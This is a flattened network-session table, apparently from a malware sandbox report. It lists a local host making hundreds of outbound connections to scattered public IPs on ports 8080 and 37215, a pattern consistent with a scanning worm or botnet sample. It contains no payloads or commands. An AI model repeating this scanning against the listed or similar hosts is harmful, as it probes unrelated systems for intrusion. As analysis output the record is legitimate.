                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27908192.168.2.235446870.35.145.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27909192.168.2.2356282180.231.246.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27910192.168.2.2346364156.49.237.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27911192.168.2.23379262.12.30.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27912192.168.2.2340420142.197.69.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27913192.168.2.2339666140.222.96.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27914192.168.2.235789873.143.27.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27915192.168.2.2336980117.96.240.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27916192.168.2.2359822196.27.216.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27917192.168.2.2344980117.77.174.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27918192.168.2.2348080111.104.180.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27919192.168.2.2335310146.6.169.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27920192.168.2.2354312188.125.243.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27921192.168.2.2333354165.215.170.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27922192.168.2.2334074209.0.145.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27923192.168.2.2336778208.56.139.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27924192.168.2.235895441.131.130.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27925192.168.2.235006013.162.108.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27926192.168.2.2354660205.142.37.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27927192.168.2.233756642.54.77.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27928192.168.2.235652467.54.90.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27929192.168.2.235252485.13.201.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27930192.168.2.2339822123.218.235.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27931192.168.2.23518682.116.87.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27932192.168.2.2356790188.154.182.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27933192.168.2.234867294.112.5.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27934192.168.2.2335748146.167.18.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27935192.168.2.2344944149.116.208.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27936192.168.2.2340542179.225.136.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27937192.168.2.2345686101.59.167.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27938192.168.2.234985478.214.92.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27939192.168.2.2355638197.28.147.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27940192.168.2.23609424.53.77.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27941192.168.2.2354382197.213.22.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27942192.168.2.2338796157.10.5.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27943192.168.2.2340156157.191.151.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27944192.168.2.235418241.94.252.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27945192.168.2.233526037.12.219.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27946192.168.2.2354282197.131.70.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27947192.168.2.2348460149.94.195.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27948192.168.2.2352616166.45.12.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27949192.168.2.235938038.255.90.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27950192.168.2.235535441.212.184.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27951192.168.2.2360288197.114.177.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27952192.168.2.2342524172.9.83.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27953192.168.2.2351792197.214.104.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27954192.168.2.2343518193.206.169.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27955192.168.2.2335254157.24.59.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27956192.168.2.2352908164.145.159.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27957192.168.2.233935068.101.53.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27958192.168.2.233939441.48.54.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27959192.168.2.2332974157.234.3.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27960192.168.2.2343934157.215.34.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27961192.168.2.233764041.166.127.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27962192.168.2.2355736197.249.195.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27963192.168.2.2355256197.147.125.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27964192.168.2.2339336157.217.98.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27965192.168.2.234791041.24.255.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27966192.168.2.2340304157.121.181.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27967192.168.2.235515835.159.164.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27968192.168.2.2354460157.26.190.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27969192.168.2.2338178118.8.111.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27970192.168.2.2356272197.242.200.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27971192.168.2.233571634.252.79.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27972192.168.2.234477641.225.103.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27973192.168.2.2358050197.162.146.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27974192.168.2.235718241.250.185.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27975192.168.2.2343102197.48.82.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27976192.168.2.2354168157.63.202.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27977192.168.2.235204641.248.27.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27978192.168.2.234244041.201.242.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27979192.168.2.2335304103.233.136.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27980192.168.2.235981664.15.216.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27981192.168.2.235920041.22.203.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27982192.168.2.2339722197.124.54.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27983192.168.2.233486841.245.208.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27984192.168.2.2360192157.241.239.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27985192.168.2.2355984157.131.211.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27986192.168.2.2344560157.96.53.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27987192.168.2.234274041.142.26.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27988192.168.2.2359390197.94.143.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27989192.168.2.2342488201.195.57.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27990192.168.2.2349382140.45.55.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27991192.168.2.2336582157.114.43.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27992192.168.2.234513441.175.221.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27993192.168.2.2335106157.248.223.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27994192.168.2.2346738167.166.220.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27995192.168.2.234018641.211.255.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27996192.168.2.2360788217.244.69.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27997192.168.2.234525641.1.190.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27998192.168.2.2334924157.95.223.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27999192.168.2.234198641.109.57.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28000192.168.2.2338192222.161.142.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28001192.168.2.234069041.172.153.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28002192.168.2.235016241.215.116.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28003192.168.2.2338538197.27.254.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28004192.168.2.2345442176.237.195.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28005192.168.2.235582641.169.100.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28006192.168.2.234175841.213.173.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28007192.168.2.235005441.182.11.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28008192.168.2.235753641.186.1.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28009192.168.2.2349196197.66.203.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28010192.168.2.235883841.87.14.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28011192.168.2.234389241.37.47.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28012192.168.2.234155881.150.86.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28013192.168.2.2346464197.173.35.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28014192.168.2.234773641.28.161.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28015192.168.2.233348041.159.137.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28016192.168.2.2348756157.195.14.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28017192.168.2.235736441.0.166.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28018192.168.2.2347680140.207.12.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28019192.168.2.235723641.86.84.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28020192.168.2.234583041.176.141.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28021192.168.2.2358980157.233.39.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28022192.168.2.2340274183.232.77.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28023192.168.2.2358018197.80.39.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28024192.168.2.2352602197.229.64.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28025192.168.2.233298841.52.78.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28026192.168.2.2343756205.106.33.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28027192.168.2.2343492157.187.134.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28028192.168.2.234941641.114.162.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28029192.168.2.2353686157.246.68.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28030192.168.2.235726641.161.104.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28031192.168.2.2359076192.66.8.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28032192.168.2.234963831.97.29.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28033192.168.2.2339346216.41.123.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28034192.168.2.234588058.75.99.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28035192.168.2.235605649.179.103.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28036192.168.2.2353744197.169.184.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28037192.168.2.2357828197.9.129.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28038192.168.2.2346888157.228.82.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28039192.168.2.2334304157.174.164.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28040192.168.2.2357888157.242.61.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28041192.168.2.2347554157.40.163.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28042192.168.2.235433641.187.116.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28043192.168.2.234191840.159.25.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28044192.168.2.2352908157.50.44.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28045192.168.2.2348230197.4.155.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28046192.168.2.235372241.4.182.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28047192.168.2.234625841.221.79.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28048192.168.2.234276079.73.239.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28049192.168.2.2339024107.227.110.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28050192.168.2.234255241.14.251.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28051192.168.2.2333646157.155.163.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28052192.168.2.234826041.126.234.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28053192.168.2.2343866197.92.95.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28054192.168.2.2351384157.175.110.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28055192.168.2.2341962157.19.248.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28056192.168.2.233998641.76.164.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28057192.168.2.2350516107.18.159.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28058192.168.2.235718641.79.128.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28059192.168.2.2350430197.254.215.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28060192.168.2.2346716189.136.195.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28061192.168.2.2356106138.19.24.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28062192.168.2.2338912180.231.168.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28063192.168.2.234717053.198.244.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28064192.168.2.2341332161.59.242.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28065192.168.2.234898041.179.84.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28066192.168.2.2347766197.91.79.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28067192.168.2.234340041.90.52.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28068192.168.2.2352828197.30.67.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28069192.168.2.2334712197.143.53.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28070192.168.2.2340056197.87.188.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28071192.168.2.2351782157.128.107.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28072192.168.2.234253841.121.122.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28073192.168.2.234743612.224.27.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28074192.168.2.2360808197.114.198.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28075192.168.2.2346414197.54.235.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28076192.168.2.2336652197.247.233.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28077192.168.2.2346140197.147.145.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28078192.168.2.2338688157.183.22.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28079192.168.2.2355938123.197.38.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28080192.168.2.2351066197.85.108.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28081192.168.2.2349196197.32.136.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28082192.168.2.2358398157.189.90.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28083192.168.2.2335080101.255.42.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28084192.168.2.2356004197.202.117.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28085192.168.2.2334284157.28.196.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28086192.168.2.235413241.252.8.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28087192.168.2.2339652197.35.40.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28088192.168.2.233703858.181.194.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28089192.168.2.234929614.9.80.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28090192.168.2.2351644157.116.25.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28091192.168.2.2344124197.183.202.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28092192.168.2.236018841.219.67.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28093192.168.2.2359564190.242.92.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28094192.168.2.2339984157.208.100.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28095192.168.2.2347086157.69.202.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28096192.168.2.233477441.163.205.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28097192.168.2.2357108197.212.6.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28098192.168.2.2350688197.66.9.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28099192.168.2.233682041.203.115.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28100192.168.2.2350986197.149.213.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28101192.168.2.2334524197.133.146.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28102192.168.2.2341122111.40.90.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28103192.168.2.234246041.174.64.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28104192.168.2.2334218157.130.69.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28105192.168.2.235019241.30.113.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28106192.168.2.2346252157.137.6.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28107192.168.2.2336478157.8.184.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28108192.168.2.233706841.210.35.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28109192.168.2.2360552157.222.40.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28110192.168.2.2359420197.198.19.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28111192.168.2.2355702197.30.227.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28112192.168.2.2335900100.48.34.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28113192.168.2.2347804188.108.198.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28114192.168.2.2356254105.105.237.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28115192.168.2.234922470.51.38.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28116192.168.2.233300020.153.62.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
